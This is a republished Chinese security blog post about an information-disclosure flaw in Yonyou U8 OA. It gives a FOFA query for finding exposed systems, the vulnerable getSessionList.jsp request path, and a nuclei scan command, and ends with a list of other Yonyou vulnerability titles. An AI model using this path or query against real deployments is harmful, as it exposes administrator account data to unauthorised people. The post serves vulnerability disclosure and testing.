用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞-nuclei

admin
admin
admin
139018
文章
114
评论
2022年10月1日11:09:46评论122 views字数 905阅读3分1秒阅读模式
用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞-nuclei
文章声明

安全文章技术仅供参考,此文所提供的信息为漏洞靶场进行渗透,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
本文所提供的工具仅用于学习,禁止用于其他,未经授权,严禁转载,如需转载私信联系。



用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞-nuclei


漏洞简介


用友 U8 OA getSessionList.jsp文件,通过漏洞攻击者可以获取数据库中管理员的账户信息



漏洞影响


友 U8 OA
fofa:
    "用友U8-OA"


漏洞复现

用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞-nuclei

存在漏洞的地址

/yyoa/ext/https/getSessionList.jsp?cmd=getAll

用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞-nuclei



nuclei-pocs

nuclei -t yonyou_U8_OA_getSessionList.yaml -l url.txt

公众号回复0924获取

用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞-nuclei




用友漏洞待更新记录

  • 用友 U8 OA test.jsp SQL注入漏洞

  • 用友nc v6.5 远程命令执行漏洞CNVD-2021-30167

  • 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

  • 用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞

  • 用友 畅捷通T+ Upload.aspx 任意文件上传漏洞

  • 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

  • 用友 NCCloud FS文件管理SQL注入

  • 用友 NC NCFindWeb 任意文件读取漏洞

  • 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

  • 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923

  • 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

  • 用友 ERP-NC NCFindWeb 目录遍历漏洞

  • 用友nc v6.5 反序列化漏洞 补丁绕过

  • 用友nc v6.5 反序列化漏洞

  • 用友nc v6.5 反射型xss

  • 用友nc v6.5 前台任意文件上传漏洞

  • (CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞

  • 用友 GRP-u8 前台存在任意文件上传漏洞

  • 用友nc IUFO v5.3 反射型xss

  • 用友nc 控制台绕过漏洞

  • 用友nc 数据库密码解密




原文始发于微信公众号(北极星sec):用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞-nuclei

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月1日11:09:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞-nucleihttps://cn-sec.com/archives/1315079.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息